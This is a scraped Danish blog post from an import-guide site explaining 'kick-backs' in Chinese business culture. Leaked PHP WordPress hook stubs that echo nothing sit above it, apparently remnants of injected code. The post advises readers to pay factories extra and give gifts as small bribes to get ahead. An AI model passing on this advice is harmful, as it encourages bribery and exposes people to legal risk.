add_action("wp_head", "wpinfoaj2"); function wpinfoaj2(){ echo ""; } add_action("wp_head", "wpinfoaj5"); function wpinfoaj5(){ echo ""; } add_action("wp_head", "wpinfoaj6"); function wpinfoaj6(){ echo ""; }add_action("wp_head", "wpinfoaj1"); function wpinfoaj1(){ echo ""; }

Forretningskultur i Kina: Hvad er en “kick-back”? | Kina Import Guiden
Kina Import Guiden - Kina Import Guiden – om at importere fra Kina, handel med Kina og produktion i Kina. Læs her inden du starter en kina butik eller webshop med kina varer.

Forretningskultur i Kina: Hvad er en “kick-back”?

Hvordan kan man køre i en ny Mercedes, når man tjener 20.000 kroner om måneden? Dette er et spørgsmål som kineserne forlængst har lært ikke at stille.

Svaret er oftest relateret til den utrolig udbredte praktis, at modtage små-bestikkelser, penge under bordet – de såkaldte “kick-backs”, dette er penge som man betaler til gengæld for at komme øverst i stakken. Det foregår næsten altid i forbindelse med mellemmænd af forskellig slags. Det kan være alt lige fra agenten til tolken, som på en eller anden måde tager imod bestikkelse.

Kick-backs bruges overalt, og det er derfor svært at vide hvem man kan regne med og stole på, når der gøres forretning i Kina. Det leder også ofte til problemer, når man som dansker laver forretning i Kina, hvis man ikke kender til kick-backs eller ikke er opmærksom på det. Man bliver nemt snydt, kan nemt blive forbigået eller ikke få opmærksomhed, hvis man ikke har betalt lidt ekstra i en rød kuvert i lommen, eller ved at invitere de rigtige ud til en dyr middag.

Det er derfor vigtigt at vide at kick-backs er en stor og almindelig del af forretningskulturen i Kina, om man er enig i det eller ej, så får man mest ud af at spille efter kinesernes regler, når man vil importere fra Kina.

Det du skal gøre er:

- Få anbefalet en tolk eller en guide af noget du kender eller stole på, så er chancerne større for at tolken eller guiden ikke går bag din ryg.

- Hvis du kan se at du kommer bagerst i køen af importører på fabrikken i Kina, så snak med fabrikken og tilbyd dem lidt ekstra, så vil du komme op i køen.

Kick-back kan være en %del penge, det kan være dyre cigaretter (tænk ikke på om de ryger eller ej, fordi det gør langt de fleste mænd i Kina), en middag eller vin eller sprut.